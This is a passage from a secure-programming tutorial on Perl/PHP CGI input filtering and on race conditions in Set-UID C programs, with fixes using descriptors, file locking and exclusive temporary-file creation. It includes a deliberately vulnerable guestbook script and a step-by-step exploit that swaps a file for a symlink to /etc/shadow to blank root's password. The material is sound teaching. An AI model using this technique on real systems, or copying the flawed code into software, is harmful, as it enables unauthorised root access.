It’s also recommended to add “use strict;” at the beginning of your programs. This forces you to declare variables; some people will find that annoying, but it’s mandatory if you use mod_perl.

Thus, your Perl CGI scripts must begin with :

#!/usr/bin/perl -wT
use strict;
use CGI;

or, with Perl 5.6.0 and later :

#!/usr/bin/perl -T
use warnings;
use strict;
use CGI;

Call to open()

Many programmers open a file simply using open(FILE,"$filename") || .... We already saw the risks of such code. To reduce the risk, specify the open mode :

  • open(FILE,"<$filename") || ... for read only;
  • open(FILE,">$filename") || ... for write only

Don’t open your files in an unspecified way.

Before accessing a file, it’s recommended to check if the file exists. This doesn’t prevent the race conditions types of problems presented in the previous article, but avoids some traps such as commands with arguments.

if ( -e $filename ) { ... }

Starting from Perl 5.6, there’s a new syntax for open() : open(FILEHANDLE,MODE,LIST). With the ‘<’ mode, the file is opened for reading; with the ‘>’ mode, the file is truncated or created if needed, and opened for writing. This becomes interesting for modes communicating with other processes. If the mode is ‘|-’ or ‘-|’, the LIST argument is interpreted as a command and is respectively found after or before the pipe.
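A sketch of both uses, assuming a Unix-like system and a Perl recent enough to support the list form of a piped open. The read_file and run_command helper names, and the use of /bin/echo as a test program, are illustrative only.

```perl
use strict;
use warnings;

# Hypothetical helper: read a file with an explicit '<' mode. A name such
# as "/bin/ls |" is then just a (nonexistent) file name, never a command.
sub read_file {
    my ($filename) = @_;
    open(my $fh, '<', $filename) or return;
    local $/;                      # slurp the whole file
    my $content = <$fh>;
    close($fh);
    return $content;
}

# Hypothetical helper: run a command and capture its output. With the
# list form, arguments are passed to the program directly, without a
# shell, so ';', '|' or line feeds in them are not interpreted.
sub run_command {
    my ($program, @args) = @_;
    open(my $pipe, '-|', $program, @args) or return;
    my @lines = <$pipe>;
    close($pipe);
    return join '', @lines;
}

print run_command('/bin/echo', 'kmaster;cat /etc/passwd');
```

Here echo simply prints its argument, semicolon included, because no shell ever parses the string.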

Before Perl 5.6 and open() with three arguments, some people used the sysopen() command.

Input escaping and filtering

There are two methods : either you specify the forbidden characters, or you explicitly define the allowed characters using regular expressions. The example programs should have convinced you that it’s quite easy to forget to filter potentially dangerous characters; that’s why the second method is recommended.

Practically, here is what to do : first, check the request only holds allowed characters. Next, escape the characters considered as dangerous among the allowed ones.

#!/usr/bin/perl -wT

# filtre.pl

#  The $safe and $danger variables respectively define
#  the characters without risk and the risky ones.
#  Add or remove some to change the filter.
#  Only $input containing characters included in the
#  definitions are valid.

use strict;

my $input = shift;

my $safe = '\w\d';
my $danger = '&`\'\\|"*?~<>^(){}\$\n\r\[\]';
#Note:
#  '/', space and tab are not part of the definitions on purpose


if ($input =~ m/^[$safe$danger]+$/g) {
    $input =~ s/([$danger]+)/\\$1/g;
} else {
    die "Bad input chars in $input\n";
}
print "input = [$input]\n";

This script defines two character sets :

  • $safe contains the ones considered as not risky (here, letters, digits and the underscore, since \w also matches ‘_’);
  • $danger contains the characters to be escaped since they are allowed but potentially dangerous.

Every request containing a character not present in one of the two sets is immediately rejected.

PHP scripts

I don’t want to be controversial, but I think it’s better to write scripts in PHP rather than in Perl. More exactly, as a system administrator, I prefer my users to write scripts in PHP rather than in Perl. Someone programming insecurely in PHP is just as dangerous as someone doing so in Perl, so why prefer PHP ? If you have programming problems with PHP, you can activate the Safe mode (safe_mode=on) or deactivate functions (disable_functions=...). This mode prevents accessing files not belonging to the user, changing environment variables unless explicitly allowed, executing commands, etc.

By default, the Apache banner informs us about the PHP being used.

$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.localdomain.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Tue, 03 Apr 2001 11:22:41 GMT
Server: Apache/1.3.14 (Unix)  (Red-Hat/Linux) mod_ssl/2.7.1
        OpenSSL/0.9.5a PHP/4.0.4pl1 mod_perl/1.24
Connection: close
Content-Type: text/html

Connection closed by foreign host.

Write expose_php = Off into /etc/php.ini to hide this information :

Server: Apache/1.3.14 (Unix)  (Red-Hat/Linux) mod_ssl/2.7.1
OpenSSL/0.9.5a mod_perl/1.24

The /etc/php.ini file (PHP4) and /etc/httpd/php3.ini have many parameters that can help harden the system. For instance, the “magic_quotes_gpc” option escapes, with a backslash, the quotes found in the arguments received by the GET and POST methods and via cookies; this avoids a number of problems found in our Perl examples.

Conclusion

This article is probably the most easily understood among the articles in this series. It shows vulnerabilities exploited every day on the web. There are many others, often related to bad programming (for instance, a script sending a mail, taking the From: field as an argument, provides a good site for spamming). Examples are too numerous. As soon as a script is on a web site, you can bet at least one person will try to use it the wrong way.

This article ends the series about secure programming. We hope we helped you discover the main security holes found in too many applications, and that you will take the “security” parameter into account when designing and programming your applications. Security problems are often neglected because of the limited scope of the development (internal use, private network use, temporary model, etc.). Nevertheless, a module originally designed for very restricted use can become the base of a much bigger application, and changes made later on will then be much more expensive.


Some URI Encoded characters

URI Encoding (ISO 8859-1)    Character
%00                          \0 (end of string)
%0a                          \n (newline)
%20                          space
%21                          !
%22                          "
%23                          #
%26                          & (ampersand)
%2f                          /
%3b                          ;
%3c                          <
%3e                          >

Table 1 : ISO 8859-1 and character correspondence


The faulty guestbook.cgi program

#!/usr/bin/perl -w

# guestbook.cgi

BEGIN { $ENV{PATH} = '/usr/bin:/bin' }
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};   # Make %ENV safer =:-)
print "Content-type: text/html\n\n";
print "<HTML>\n<HEAD><TITLE>Buggy Guestbook</TITLE></HEAD>\n";
&ReadParse(\%input);
my $email= $input{email};
my $texte= $input{texte};
$texte =~ s/\n/<BR>/g;

print "<BODY><A HREF=\"guestbook.html\">
       GuestBook </A><BR><form action=\"$ENV{'SCRIPT_NAME'}\">\n
      Email: <input type=texte name=email><BR>\n
      Texte:<BR>\n<textarea name=\"texte\" rows=15 cols=70>
      </textarea><BR><input type=submit value=\"Go!\">
      </form>\n";
print "</BODY>\n";
print "</HTML>";
open (FILE,">>guestbook.html") || die ("Cannot write\n");
print FILE "Email: $email<BR>\n";
print FILE "Texte: $texte<BR>\n";
print FILE "<HR>\n";
close(FILE);
exit(0);

sub ReadParse {
  my $in =shift;
  my ($i, $key, $val);
  my $in_first;
  my @in_second;

  # Read in text
  if ($ENV{'REQUEST_METHOD'} eq "GET") {
    $in_first = $ENV{'QUERY_STRING'};
  } elsif ($ENV{'REQUEST_METHOD'} eq "POST") {
    read(STDIN,$in_first,$ENV{'CONTENT_LENGTH'});
  }else{
    die "ERROR: unknown request method\n";
  }

  @in_second = split(/&/,$in_first);

  foreach $i (0 .. $#in_second) {
    # Convert plus's to spaces
    $in_second[$i] =~ s/\+/ /g;

    # Split into key and value.
    ($key, $val) = split(/=/,$in_second[$i],2);

    # Convert %XX from hex numbers to alphanumeric
    $key =~ s/%(..)/pack("c",hex($1))/ge;
    $val =~ s/%(..)/pack("c",hex($1))/ge;

    # Associate key and value
    $$in{$key} .= "" if (defined($$in{$key}));
    $$in{$key} .= $val;

  }

  return length($#in_second);
}


Avoiding security holes when developing an application – Part 5: race conditions


Introduction

The general principle defining race conditions is the following : a process wants to access a system resource exclusively. It checks that the resource is not already used by another process, then uses it as it pleases. The race condition occurs when another process tries to use the same resource in the time lag between the first process checking that resource and actually taking it over. The side effects may vary. The classical case in OS theory is the deadlock of both processes. More often it leads to application malfunction, or even to security holes when a process wrongfully benefits from the privileges of another.

What we previously called a resource can take different forms. The best known are the race conditions discovered and corrected in the Linux kernel itself, due to concurrent access to memory areas. Here, we will focus on system applications and consider that the resources concerned are filesystem nodes. This concerns not only regular files but also direct access to devices through special entry points from the /dev/ directory.

Most of the time, an attack aiming to compromise system security is done against Set-UID applications, since the attacker can benefit from the privileges of the owner of the executable file. However, unlike previously discussed security holes (buffer overflow, format strings…), race conditions usually don’t allow the execution of “customized” code. Rather, they benefit from the resources of a program while it’s running. This type of attack is also aimed at “normal” utilities (not Set-UID), the cracker lying in ambush for another user, especially root, to run the application concerned and access its resources. This holds for writing to a file (e.g. ~/.rhosts, in which the string “+ +” provides direct access from any machine without a password) as well as for reading a confidential file (sensitive commercial data, personal medical information, password file, private key…).

Unlike the security holes discussed in our previous articles, this security problem applies to every application and not just to Set-UID utilities and system servers or daemons.

First example

Let’s have a look at the behavior of a Set-UID program that needs to save data in a file belonging to the user. We could, for instance, consider the case of a mail transport program like sendmail. Let’s suppose the user can provide both a backup filename and a message to write into that file, which is plausible under some circumstances. The application must then check that the file belongs to the person who started the program. It will also check that the file is not a symlink to a system file. Let’s not forget that the program, being Set-UID root, is allowed to modify any file on the machine. Accordingly, it will compare the file’s owner to its own real UID. Let’s write something like :

1     /* ex_01.c */
2     #include <stdio.h>
3     #include <stdlib.h>
4     #include <unistd.h>
5     #include <sys/stat.h>
6     #include <sys/types.h>
7
8     int
9     main (int argc, char * argv [])
10    {
11        struct stat st;
12        FILE * fp;
13
14        if (argc != 3) {
15            fprintf (stderr, "usage : %s file message\n", argv [0]);
16            exit(EXIT_FAILURE);
17        }
18        if (stat (argv [1], & st) < 0) {
19            fprintf (stderr, "can't find %s\n", argv [1]);
20            exit(EXIT_FAILURE);
21        }
22        if (st . st_uid != getuid ()) {
23            fprintf (stderr, "not the owner of %s \n", argv [1]);
24            exit(EXIT_FAILURE);
25        }
26        if (! S_ISREG (st . st_mode)) {
27            fprintf (stderr, "%s is not a normal file\n", argv[1]);
28            exit(EXIT_FAILURE);
29        }
30
31        if ((fp = fopen (argv [1], "w")) == NULL) {
32            fprintf (stderr, "Can't open\n");
33            exit(EXIT_FAILURE);
34        }
35        fprintf (fp, "%s\n", argv [2]);
36        fclose (fp);
37        fprintf (stderr, "Write Ok\n");
38        exit(EXIT_SUCCESS);
39    }

As we explained in our first article, it would be better for a Set-UID application to temporarily drop its privileges and open the file using the real UID of the user who called it. As a matter of fact, the above situation corresponds rather to a daemon providing services to every user. Always running under the root ID, it would check against the UID of the requesting user instead of its own real UID. Nevertheless, we’ll keep this scheme for now, even if it isn’t that realistic, since it allows us to understand the problem while easily “exploiting” the security hole.

As we can see, the program starts by doing all the needed checks, i.e. that the file exists, that it belongs to the user and that it’s a normal file. Next, it actually opens the file and writes the message. That is where the security hole lies! Or, more exactly, it’s within the lapse of time between the reading of the file attributes with stat() and its opening with fopen(). This lapse of time is often extremely short, but an attacker can benefit from it to change the file’s characteristics. To make our attack even easier, let’s add a line that causes the process to sleep between the two operations, thus giving us the time to do the job by hand. Let’s change line 30 (previously empty) and insert :

30        sleep (20);

Now, let’s implement it; first, let’s make the application Set-UID root. Before that, and this is very important, let’s make a backup copy of our password file /etc/shadow :

$ cc ex_01.c -Wall -o ex_01
$ su
Password:
# cp /etc/shadow /etc/shadow.bak
# chown root.root ex_01
# chmod +s ex_01
# exit
$ ls -l ex_01
-rwsrwsr-x 1 root  root    15454 Jan 30 14:14 ex_01
$

Everything is ready for the attack. We are in a directory belonging to us. We have a Set-UID root utility (here ex_01) holding a security hole, and we feel like replacing the line concerning root from the /etc/shadow password file with a line containing an empty password.

First, we create a fic file belonging to us :

$ rm -f fic
$ touch fic

Next, we run our application in the background “to keep the lead”. We ask it to write a string into that file. It checks what it has to, sleeps for a while before really accessing the file.

$ ./ex_01 fic "root::1:99999:::::" &
[1] 4426

The content of the root line comes from the shadow(5) man page, the most important part being the empty second field (no password). While the process is asleep, we have about 20 seconds to remove the fic file and replace it with a link (symbolic or physical, both work) to the /etc/shadow file. Let’s remember that every user can create a link to a file in a directory belonging to him (or in /tmp, as we’ll see a bit later), even if he can’t read the content. However, it isn’t possible to create a copy of such a file, since that would require a full read.

$ rm -f fic
$ ln -s /etc/shadow ./fic

Then we ask the shell to bring the ex_01 process back to the foreground with the fg command, and wait till it finishes :

$ fg
./ex_01 fic "root::1:99999:::::"
Write Ok
$

Voilà ! It’s over, the /etc/shadow file only holds one line indicating root has no password. You don’t believe it ?

$ su
# whoami
root
# cat /etc/shadow
root::1:99999:::::
#

Let’s finish our experiment by putting the old password file back :

# cp /etc/shadow.bak /etc/shadow
cp: replace `/etc/shadow'? y
#

Let’s be more realistic

We succeeded in exploiting a race condition in a Set-UID root utility. Of course, this program was very “helpful” waiting for 20 seconds giving us time to modify the files behind its back. Within a real application, the race condition only applies for a very short time. How do we take advantage of that ?

Usually, the cracker relies on a brute force attack, renewing the attempts hundreds, thousands or ten thousand times, using scripts to automate the sequence. It’s possible to improve the chance of “falling” into the security hole with various tricks aiming at increasing the lapse of time between the two operations that the program wrongly considers as atomically linked. The idea is to slow down the target process to manage the delay preceding the file modification more easily. Different approaches can help us to reach our goal :

  • To reduce the priority of the attacked process as much as possible by running it with the nice -n 20 prefix;
  • To increase the system load, running various processes that do CPU time consuming loops (like while (1););
  • The kernel doesn’t allow debugging Set-UID programs, but it’s possible to force a pseudo step-by-step execution by sending SIGSTOP/SIGCONT signal sequences, which temporarily suspend the process (like the Ctrl-Z key combination in a shell) and then restart it when needed.

The method allowing us to benefit from a security hole based on a race condition is boring and repetitive, but it really is usable ! Let’s try to find the most effective solutions.

Possible improvement

The problem discussed above relies on the ability to change an object’s characteristics during the time lapse between two operations that should form one continuous whole. In the previous situation, the change did not concern the file itself. By the way, as a normal user it would have been quite difficult to modify, or even to read, the /etc/shadow file. As a matter of fact, the change relies on the link between the existing file node in the name tree and the file itself as a physical entity. Let’s remember that most of the system commands (rm, mv, ln, etc.) act on the file name, not on the file content. Even when you delete a file (using rm and the unlink() system call), the content is really deleted only when the last physical link (the last reference) is removed.

The mistake made in the previous program is considering the association between the name of the file and its content as unchangeable, or at least constant, during the lapse of time between stat() and fopen() operation. Thus, the example of a physical link should suffice to verify that this association is not a permanent one at all. Let’s take an example using this type of link. In a directory belonging to us, we create a new link to a system file. Of course, the file’s owner and the access mode are kept. The ln command -f option forces the creation, even if that name already exists :

$ ln -f /etc/fstab ./myfile
$ ls -il /etc/fstab myfile
8570 -rw-r--r--   2 root  root  716 Jan 25 19:07 /etc/fstab
8570 -rw-r--r--   2 root  root  716 Jan 25 19:07 myfile
$ cat myfile
/dev/hda5   /                 ext2    defaults,mand   1 1
/dev/hda6   swap              swap    defaults        0 0
/dev/fd0    /mnt/floppy       vfat    noauto,user     0 0
/dev/hdc    /mnt/cdrom        iso9660 noauto,ro,user  0 0
/dev/hda1   /mnt/dos          vfat    noauto,user     0 0
/dev/hda7   /mnt/audio        vfat    noauto,user     0 0
/dev/hda8   /home/ccb/annexe  ext2    noauto,user     0 0
none        /dev/pts          devpts  gid=5,mode=620  0 0
none        /proc             proc    defaults        0 0
$ ln -f /etc/host.conf ./myfile
$ ls -il /etc/host.conf myfile 
8198 -rw-r--r--   2 root  root   26 Mar 11  2000 /etc/host.conf
8198 -rw-r--r--   2 root  root   26 Mar 11  2000 myfile
$ cat myfile
order hosts,bind
multi on
$

The -i option of /bin/ls displays the inode number at the beginning of the line. We can see that the same name successively points to two different physical inodes.

In fact, we would like the functions that check and access the file to always point to the same content and the same inode. And it’s possible ! The kernel itself automatically manages this association when it provides us with a file descriptor. When we open a file for reading, the open() system call returns an integer value, the descriptor, which an internal table associates with the physical file. All the reading we do next will concern this file’s content, no matter what happens to the name used during the file open operation.

Let’s emphasize that point : once a file has been opened, no operation on the filename, including removing it, has any effect on the file content. As long as a process still holds a descriptor for a file, the file content isn’t removed from the disk, even if its name disappears from the directory where it was stored. The kernel maintains the association with the file content from the open() system call providing a file descriptor until the release of this descriptor by close() or the end of the process.

So there we have our solution ! We can open the file and then check the permissions by examining the characteristics of the descriptor instead of those of the filename. This is done using the fstat() system call, which works like stat() but checks a file descriptor rather than a path. To access the content of the file through the descriptor, we’ll use the fdopen() function, which works like fopen() but relies on a descriptor rather than on a filename. Thus, the program becomes :
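This behavior is easy to check with a small sketch. The helper name read_after_unlink() and its interface are assumptions made for this illustration, not part of the programs discussed here : it creates a file, writes a string into it, removes the name with unlink(), and then reads the content back through the descriptor that is still open.

```c
#include <fcntl.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper (illustration only): creates `path`, writes `msg`
 * into it, deletes the name, then reads the content back through the
 * still open descriptor. Returns the number of bytes read, -1 on error. */
ssize_t
read_after_unlink (const char * path, const char * msg,
                   char * buf, size_t size)
{
    ssize_t n;
    size_t len = strlen (msg);
    int fd = open (path, O_RDWR | O_CREAT | O_EXCL, 0600);

    if (fd < 0)
        return -1;
    if (write (fd, msg, len) != (ssize_t) len) {
        close (fd);
        unlink (path);
        return -1;
    }
    /* The name disappears from the directory... */
    if (unlink (path) < 0) {
        close (fd);
        return -1;
    }
    /* ...but the descriptor still designates the same inode. */
    if (lseek (fd, 0, SEEK_SET) < 0) {
        close (fd);
        return -1;
    }
    n = read (fd, buf, size);
    close (fd);   /* the content is freed only now */
    return n;
}
```

Called with a name in a directory belonging to us, the function should return the length of the message even though the name no longer exists when read() is called.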

1     /* ex_02.c */
2     #include <fcntl.h>
3     #include <stdio.h>
4     #include <stdlib.h>
5     #include <unistd.h>
6     #include <sys/stat.h>
7     #include <sys/types.h>
8
9     int
10    main (int argc, char * argv [])
11    {
12        struct stat st;
13        int fd;
14        FILE * fp;
15
16        if (argc != 3) {
17            fprintf (stderr, "usage : %s file message\n", argv [0]);
18            exit(EXIT_FAILURE);
19        }
20        if ((fd = open (argv [1], O_WRONLY, 0)) < 0) {
21            fprintf (stderr, "Can't open %s\n", argv [1]);
22            exit(EXIT_FAILURE);
23        }
24        /* Check the descriptor, not the name; fstat() can fail too */
25        if (fstat (fd, & st) < 0) {
26            fprintf (stderr, "Can't stat %s\n", argv [1]);
27            exit(EXIT_FAILURE);
28        }
29        if (st . st_uid != getuid ()) {
30            fprintf (stderr, "%s not owner !\n", argv [1]);
31            exit(EXIT_FAILURE);
32        }
33        if (! S_ISREG (st . st_mode)) {
34            fprintf (stderr, "%s not a normal file\n", argv[1]);
35            exit(EXIT_FAILURE);
36        }
37        if ((fp = fdopen (fd, "w")) == NULL) {
38            fprintf (stderr, "Can't open\n");
39            exit(EXIT_FAILURE);
40        }
41        fprintf (fp, "%s", argv [2]);
42        fclose (fp);
43        fprintf (stderr, "Write Ok\n");
44        exit(EXIT_SUCCESS);
45    }

This time, after line 20, no change to the filename (deleting, renaming, linking) will affect our program’s behavior; the content of the original physical file will be kept.

Guidelines

When manipulating a file it’s important to ensure the association between the internal representation and the real content stays constant. Preferably, we’ll use the following system calls to manipulate the physical file as an already open descriptor rather than their equivalents using the path to the file :

System call                              Use
fchdir (int fd)                          Changes to the directory represented by fd.
fchmod (int fd, mode_t mode)             Changes the file access rights.
fchown (int fd, uid_t uid, gid_t gid)    Changes the file owner.
fstat (int fd, struct stat * st)         Reads the information stored in the inode of the physical file.
ftruncate (int fd, off_t length)         Truncates an existing file.
fdopen (int fd, const char * mode)       Initializes IO from an already open descriptor. It’s an stdio library routine, not a system call.

Then, of course, you must open the file in the wanted mode, calling open() (don’t forget the third argument when creating a new file). More on open() later when we discuss the temporary file problem.

We must insist on the importance of checking the return codes of system calls. For instance, let’s mention, even if it has nothing to do with race conditions, a problem found in old /bin/login implementations that neglected an error code check. This application automatically provided root access when it did not find the /etc/passwd file. This behavior can seem acceptable when it comes to repairing a damaged file system. On the other hand, checking that it was impossible to open the file, instead of checking whether the file really existed, was less acceptable. Calling /bin/login after opening the maximum number of allowed descriptors gave any user root access… Let’s end this digression by insisting on how important it is to check not only the success or failure of a system call, but the error code too, before taking any action affecting system security.
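To make the difference between “the file does not exist” and “the file could not be opened” concrete, here is a minimal sketch. The open_checked() function and the open_status enumeration are hypothetical names introduced for this example; the only thing taken for granted is that open() sets errno to ENOENT when the file is missing, and to other values (EMFILE, ENFILE, EACCES…) for unrelated failures.

```c
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

/* Hypothetical classification, for illustration only. */
enum open_status { OPEN_OK, OPEN_MISSING, OPEN_ERROR };

enum open_status
open_checked (const char * path, int * fd_out)
{
    int fd = open (path, O_RDONLY);

    if (fd >= 0) {
        * fd_out = fd;
        return OPEN_OK;
    }
    /* Only ENOENT means "the file is not there". EMFILE (too many
     * open descriptors), EACCES, etc. say nothing about whether
     * the file exists, and must not be treated as "missing". */
    if (errno == ENOENT)
        return OPEN_MISSING;
    return OPEN_ERROR;
}
```

A caller that grants something special when a file is missing should do so only on OPEN_MISSING, and treat OPEN_ERROR as a refusal.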

Race conditions to the file content

A program dealing with system security shouldn’t rely on exclusive access to a file’s content. More exactly, it’s important to properly manage the risks of race conditions on the same file. The main danger comes from a user running multiple instances of a Set-UID root application simultaneously, or establishing multiple connections at once with the same daemon, hoping to create a race condition during which the content of a system file could be modified in an unusual way.

To avoid a program being sensitive to this kind of situation, it’s necessary to institute an exclusive access mechanism to the file data. This is the same problem as the one found in databases when various users are allowed to simultaneously query or change the content of a file. The principle of file locking solves this problem.

When a process wants to write into a file, it asks the kernel to lock that file – or a part of it. As long as the process keeps the lock, no other process can ask to lock the same file, or at least the same part of the file. In the same way, a process asks for a lock before reading the file content to ensure no changes will be made while it holds the lock.

As a matter of fact, the system is more clever than that : the kernel distinguishes between the locks required for file reading and those for file writing. Various processes can hold a lock for reading simultaneously since no one will attempt to change the file content. However, only one process can hold a lock for writing at a given time, and no other lock can be provided at the same time, even for reading.

There are two types of locks (mostly incompatible with each other). The first one comes from BSD and relies on the flock() system call. Its first argument is the descriptor of the file you wish to access in an exclusive way, and the second one is a symbolic constant representing the operation to be done. It can have different values : LOCK_SH (lock for reading), LOCK_EX (for writing), LOCK_UN (release of the lock). The system call blocks as long as the requested operation remains impossible. However, you can do a binary OR (|) with the LOCK_NB constant for the call to fail instead of blocking.

The second type of lock comes from System V, and relies on the fcntl() system call, whose invocation is a bit complicated. There’s a library function called lockf(), close to the system call but not as fast. The first argument of fcntl() is the descriptor of the file to lock. The second one represents the operation to be performed : F_SETLK and F_SETLKW manage a lock; the second command blocks until the operation becomes possible, while the first returns immediately in case of failure. F_GETLK consults the lock state of a file (which is useless for current applications). The third argument is a pointer to a variable of struct flock type, describing the lock. The important members of the flock structure are the following :
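As an illustration of the BSD interface, here is a minimal sketch of a non-blocking exclusive lock. The open_locked() helper is a hypothetical name chosen for this example; it only relies on flock() with LOCK_EX | LOCK_NB as described above.

```c
#include <fcntl.h>
#include <sys/file.h>
#include <unistd.h>

/* Hypothetical helper (illustration only): opens `path`, creating it
 * if needed, and tries to take an exclusive BSD lock without blocking.
 * Returns the locked descriptor, or -1 if the file can't be opened or
 * is already locked through another open of the file. */
int
open_locked (const char * path)
{
    int fd = open (path, O_RDWR | O_CREAT, 0600);

    if (fd < 0)
        return -1;
    if (flock (fd, LOCK_EX | LOCK_NB) < 0) {
        /* errno is EWOULDBLOCK when someone else holds the lock */
        close (fd);
        return -1;
    }
    return fd;
}
```

The lock is released by flock (fd, LOCK_UN) or simply by closing the descriptor. Dropping LOCK_NB would make the call wait until the lock becomes available.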

Name       Type     Meaning
l_type     short    Expected action : F_RDLCK (to lock for reading), F_WRLCK (to lock for writing) or F_UNLCK (to release the lock).
l_whence   short    Origin of the l_start field (usually SEEK_SET).
l_start    off_t    Position of the beginning of the lock (usually 0).
l_len      off_t    Length of the lock, 0 to reach the end of the file.

We can see that fcntl() can lock limited portions of a file, and it’s able to do much more than flock(). Let’s have a look at a small program asking for a lock for writing on the files whose names are given as arguments, and waiting for the user to press the Enter key before finishing (and thus releasing the locks).

/* ex_03.c */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

int
main (int argc, char * argv [])
{
  int i;
  int fd;
  char buffer [2];
  struct flock lock;

  for (i = 1; i < argc; i ++) {
    fd = open (argv [i], O_RDWR | O_CREAT, 0644);
    if (fd < 0) {
      fprintf (stderr, "Can't open %s\n", argv [i]);
      exit(EXIT_FAILURE);
    }
    /* Write lock on the whole file: from offset 0 to the end */
    lock . l_type = F_WRLCK;
    lock . l_whence = SEEK_SET;
    lock . l_start = 0;
    lock . l_len = 0;
    /* F_SETLK returns immediately if the lock can't be obtained */
    if (fcntl (fd, F_SETLK, & lock) < 0) {
      fprintf (stderr, "Can't lock %s\n", argv [i]);
      exit(EXIT_FAILURE);
    }
  }
  fprintf (stdout, "Press Enter to release the lock(s)\n");
  /* The descriptors stay open, so the locks are held until exit */
  fgets (buffer, 2, stdin);
  exit(EXIT_SUCCESS);
}

We first launch this program from a first console where it waits :

$ cc -Wall ex_03.c -o ex_03
$ ./ex_03 myfile
Press Enter to release the lock(s)

From another terminal…

    $ ./ex_03 myfile
    Can't lock myfile
    $

Pressing Enter in the first console, we release the locks.

With this locking mechanism, you can prevent race conditions on directories and print queues, as the lpd daemon does with a flock() lock on the /var/lock/subsys/lpd file, thus allowing only one instance. You can also manage access to a system file such as /etc/passwd in a secure way; it is locked using fcntl() by the pam library when a user’s data is changed.

However, this only protects from interference by well-behaved applications, that is, those asking the kernel to reserve the proper access before reading or writing an important system file. This is called cooperative locking, which shows that each application is responsible for its own data accesses. Unfortunately, a badly written program is able to replace the file content even while another, well-behaved process holds a lock for writing. Here is an example. We write a few letters into a file and lock it using the previous program :

$ echo "FIRST" > myfile
$ ./ex_03 myfile
Press Enter to release the lock(s)

From another console, we can change the file :

    $ echo "SECOND" > myfile
    $

Back to the first console, we check the “damages” :

(Enter)
$ cat myfile
SECOND
$

To solve this problem, the Linux kernel provides the sysadmin with a locking mechanism coming from System V. Therefore you can only use it with fcntl() locks and not with flock(). The administrator can tell the kernel the fcntl() locks are strict, using a particular combination of access rights. Then, if a process locks a file for writing, another process won’t be able to write into that file (even as root). The particular combination is to use the Set-GID bit while the execution bit is removed for the group. This is obtained with the command :

$ chmod g+s-x myfile
$

However, this is not enough. For a file to automatically benefit from strict locks, the mandatory attribute must be activated on the partition where it resides. Usually, you have to change the /etc/fstab file to add the mand option in the 4th column, or type the command :

# mount
/dev/hda5 on / type ext2 (rw)
[...]
# mount / -o remount,mand
# mount
/dev/hda5 on / type ext2 (rw,mand)
[...]
#

Now, we can check that a change from another console is impossible :

$ ./ex_03 myfile
Press Enter to release the lock(s)

From another terminal :

    $ echo "THIRD" > myfile
    bash: myfile: Resource temporarily unavailable
    $

And back to the first console :

(Enter)
$ cat myfile
SECOND
$

It is the administrator, not the programmer, who decides to make file locks strict (for instance on /etc/passwd or /etc/shadow). The programmer has to control the way the data is accessed, which ensures that his application handles data coherently when reading and is not dangerous for other processes when writing, as long as the environment is properly administered.

Temporary files

Very often a program needs to temporarily store data in an external file. The most usual case is inserting a record in the middle of a sequential ordered file, which implies making a copy of the original file in a temporary file while adding the new information. Next, the unlink() system call removes the original file and rename() renames the temporary file to replace the previous one.

Opening a temporary file, if not done properly, is often the starting point of race condition situations for an ill-intentioned user. Security holes based on the temporary files have been recently discovered in applications such as Apache, Linuxconf, getty_ps, wu-ftpd, rdist, gpm, inn, etc. Let’s remember a few principles to avoid this sort of trouble.

Usually, temporary file creation is done in the /tmp directory. This allows the sysadmin to know where short term data storage is done. It also makes it possible to schedule a periodic cleaning (using cron), to use an independent partition formatted at boot time, etc. Usually, the administrator defines the location reserved for temporary files in the <paths.h> and <stdio.h> files, through the definitions of the _PATH_TMP and P_tmpdir symbolic constants. As a matter of fact, using a default directory other than /tmp is not that good an idea, since it would imply recompiling every application, including the C library. However, let’s mention that the behavior of the GlibC routines can be changed using the TMPDIR environment variable. Thus, the user can ask for the temporary files to be stored in a directory belonging to him rather than in /tmp. This is sometimes mandatory when the partition dedicated to /tmp is too small to run applications requiring a large amount of temporary storage.

The /tmp system directory is something special because of its access rights :

$ ls -ld /tmp
drwxrwxrwt 7 root  root    31744 Feb 14 09:47 /tmp
$

The Sticky-Bit, represented by the letter t at the end or by the 01000 octal mode, has a particular meaning when applied to a directory : only the directory owner (root) and the owner of a file found in that directory are able to delete the file. Since the directory is writable by everyone, each user can put his files in it, being sure they are protected, at least till the next clean up managed by the sysadmin.

Nevertheless, using the temporary storage directory may cause a few problems. Let’s start with the trivial case, a Set-UID root application talking to a user. Let’s take a mail transport program. If this process receives a signal asking it to finish immediately, for instance SIGTERM or SIGQUIT during a system shutdown, it can try to save on the fly the mail already written but not sent. With old versions, this was done in /tmp/dead.letter. Then, the user just had to create (since he can write into /tmp) a physical link to /etc/passwd with the name dead.letter for the mailer (running under effective UID root) to write into this file the content of the unfinished mail (incidentally containing a line “root::1:99999:::::”).

The first problem with this behavior is the predictable nature of the filename. You only need to watch such an application once to deduce that it will use the /tmp/dead.letter file name. Therefore, the first step is to use a filename specific to the current program instance. There are various library functions able to provide us with a personal temporary filename.

Let’s suppose we have such a function providing a unique name for our temporary file. Since free software is available with its source code (and so is the C library), the filename remains predictable, even if rather difficult to guess. An attacker could create a symlink with the name provided by the C library. Our first reaction is to check whether the file exists before opening it. Naively, we could write something like :

  if ((fd = open (filename, O_RDWR)) != -1) {
    fprintf (stderr, "%s already exists\n", filename);
    exit(EXIT_FAILURE);
  }
  fd = open (filename, O_RDWR | O_CREAT, 0644);
  ...

Obviously, this is a typical case of race condition, where a security hole opens following the action from a user succeeding in creating a link to /etc/passwd between the first open() and the second one. These two operations have to be done in an atomic way, without any manipulation able to take place between them. This is possible using a specific option of the open() system call. Called O_EXCL, and used in conjunction with O_CREAT, this option makes the open() fail if the file already exists, but the check of existence is atomically linked to the creation.

By the way, the ‘x‘ GNU extension for the opening modes of the fopen() function requests an exclusive file creation, failing if the file already exists. It only makes sense together with a mode that creates the file, such as "w+":

  FILE * fp;

  if ((fp = fopen (filename, "w+x")) == NULL) {
    perror ("Can't create the file.");
    exit (EXIT_FAILURE);
  }

The temporary files permissions are quite important too. If you have to write confidential information into a mode 644 file (read/write for the owner, read only for the rest of the world) it can be a bit of a nuisance. The

   #include <sys/types.h>
    #include <sys/stat.h>

        mode_t umask(mode_t mask);

